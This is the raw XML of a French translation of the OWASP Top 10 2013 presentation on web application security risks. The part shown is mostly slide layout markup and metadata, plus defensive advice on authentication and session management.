                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proposer une interface simple aux développeurs. Prendre comme exemple l’interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ESAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Authenticator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> et ses APIs utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un effort particulier doit être accordé à la prévention des failles XSS, susceptibles d'être utilisées pour voler des identifiants de session. Voir A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>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A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296537" y="76199"/>
            <a:ext cx="5561463" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Violation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’Authentification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et de Session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="205414" y="1014596"/>
            <a:ext cx="6479714" cy="580794"/>
            <a:chOff x="205414" y="1014596"/>
            <a:chExt cx="6479714" cy="580794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="205414" y="1014596"/>
              <a:ext cx="6479714" cy="580794"/>
              <a:chOff x="205414" y="997424"/>
              <a:chExt cx="6479714" cy="580794"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32"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rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilité</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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45" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96"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46" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35"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err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’Attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800"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en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Techniques</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="37" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537"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38" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1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39" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="36" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752"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0" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="205414" y="1280701"/>
                <a:ext cx="715260"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>de Menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="42" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="4"/>
                <a:endCxn id="41" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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0" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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95686173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11/11/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="06/24/2010" val="LastModified"/>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NUM" val="4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="NUM" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="NUM" val="6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="NUM" val="7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="NUM" val="8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.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4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/20/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2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6.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8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/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3/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Aspect Mod">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3A6331"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8DC1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60415</TotalTime>
  <Words>9054</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>1063</Paragraphs>
  <Slides>23</Slides>
  <Notes>21</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Office Theme</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Release Candidate</vt:lpstr>
      <vt:lpstr>A propos de l’OWASP</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Notes de version</vt:lpstr>
      <vt:lpstr>Risques de sécurité applicatifs</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2013  Risques Sécurité des Applications</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Violation de Gestion d’Authentification et de Session</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Références directes non sécurisées à un objet</vt:lpstr>
      <vt:lpstr>Mauvaise configuration Sécurité</vt:lpstr>
      <vt:lpstr>Exposition de données sensibles</vt:lpstr>
      <vt:lpstr>Manque de contrôle d’accès au niveau fonctionnel</vt:lpstr>
      <vt:lpstr>Falsification de requête intersite (CSRF)</vt:lpstr>
      <vt:lpstr>Utilisation de composants avec des vulnérabilités connues</vt:lpstr>
      <vt:lpstr>Redirections et Renvois Non Validés</vt:lpstr>
      <vt:lpstr>Pour les développeurs</vt:lpstr>
      <vt:lpstr>Perspective pour les vérificateurs</vt:lpstr>
      <vt:lpstr>Que faire dans une entreprise ?</vt:lpstr>
      <vt:lpstr>Note à propos des Risques</vt:lpstr>
      <vt:lpstr>Détails sur les facteurs de Risques </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10 - 2013</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Dave Wichers</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>PETIT, Ludovic</cp:lastModifiedBy>
  <cp:revision>1086</cp:revision>
  <cp:lastPrinted>2013-03-22T12:48:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-06-20T13:10:25Z</dcterms:modified>
  <cp:contentStatus>FINAL</cp:contentStatus>
</cp:coreProperties>
</file>